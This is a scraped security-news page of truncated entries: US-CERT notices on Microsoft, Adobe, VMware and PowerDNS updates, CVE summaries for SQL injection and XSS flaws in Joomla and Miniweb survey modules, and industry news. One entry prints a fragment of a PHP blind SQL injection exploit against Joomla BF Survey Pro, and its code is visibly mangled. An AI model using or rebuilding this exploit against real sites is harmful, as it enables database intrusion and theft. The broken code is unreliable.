Microsoft Releases Cumulative Security Update for Internet Explorer
Microsoft has released Security Bulletin MS10-002 as a Cumulative Security Update for Internet Explorer. This update addresses multiple vulnerabilities that, when exploited, may allow an attacker to execute arbitrary code. US-CERT encourages users and administrators to review Microsoft Security...
Adobe Releases Shockwave Player Update
Adobe has released an update for Shockwave Player to address multiple vulnerabilities. These vulnerabilities affect Adobe Shockwave Player 11.5.2.602 and earlier versions for Windows and Macintosh. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code. US-CERT...
CVE-2009-4625
SQL injection vulnerability in the updateOnePage function in components/com_bfsurvey_pro/controller.php in BF Survey Pro Free (com_bfsurvey_profree) 1.2.4, and other versions before 1.2.6, a component for Joomla!, allows remote attackers to execute arbitrary SQL commands via the table parameter in an...
CVE-2009-4625
The CVE-2009-4625 entry concerns BF Survey Pro Free (com_bfsurvey_profree) for Joomla! where the updateOnePage action (table parameter) is vulnerable to SQL injection. Affected versions include 1.2.4 and other versions prior to 1.2.6. The vulnerability arises from improper validation of the table...
Adobe Releases Update for Adobe Reader and Acrobat
Adobe has released an update for Reader and Acrobat to address multiple vulnerabilities. These vulnerabilities affect Adobe Reader 9.2 and earlier versions for Windows, Macintosh, and UNIX and Adobe Acrobat 9.2 and earlier versions for Windows and Macintosh. Exploitation of these vulnerabilities...
Financial Industry Group Plans Cyber Attack Simulation
A financial services industry group is planning to simulate a series of cyber attacks to test how well banks, payment processors and retailers deal with online threats. Participants will be expected to activate their incident response procedures in accordance with the scenario presented and to...
VMware Releases Multiple Updates for ESX
VMware has released Security Advisory VMSA-2010-0001 to address multiple vulnerabilities in ESX Service Console packages for Network Security Services (NSS) and Netscape Portable Runtime (NSPR). Exploitation of these vulnerabilities may allow an attacker to obtain sensitive information, cause a...
PowerDNS Recursor Update Addresses Multiple Vulnerabilities
PowerDNS has released PowerDNS Recursor 3.1.7.2 to address multiple vulnerabilities. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or spoof DNS information. US-CERT encourages users and administrators to review PowerDNS...
Microsoft Releases Advance Notification for January Security Bulletin
Microsoft has issued a Security Bulletin Advance Notification indicating that its January release cycle will contain one bulletin, which will have a severity rating of Critical. The notification states that this bulletin is for Microsoft Windows. Release of this bulletin is scheduled for Tuesday,...
Cross-site scripting
Cross-site scripting (XSS) vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php...
SQL injection
SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php...
CVE-2009-4551
SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php...
CVE-2009-4552
Cross-site scripting (XSS) vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php...
CVE-2009-4552
CVE-2009-4552 is an XSS vulnerability in the Miniweb 2.0 Survey Pro module. It allows remote attackers to inject arbitrary script/HTML via PATH_INFO to index.php. Affected: Miniweb 2.0 (Survey Pro). Root cause: unsanitized PATH_INFO input leading to reflected script execution. Impact: client-side...
CVE-2009-4551
SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php. Affected software: Miniweb 2.0, Survey Pro module. Impact as per NVD: base score 7.5 (HIGH). Exploitation ...
Joomla BF Survey Pro SQL Injection
1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...
Security Audits: Important but Rare
From eSecurityPlanet (Larry Barrett): Securing data networks is important enough for the majority of companies to hire outside security firms to audit their systems, but only about one in three bother to have their network audited every year, according to a new survey conducted by VanDyke Software an...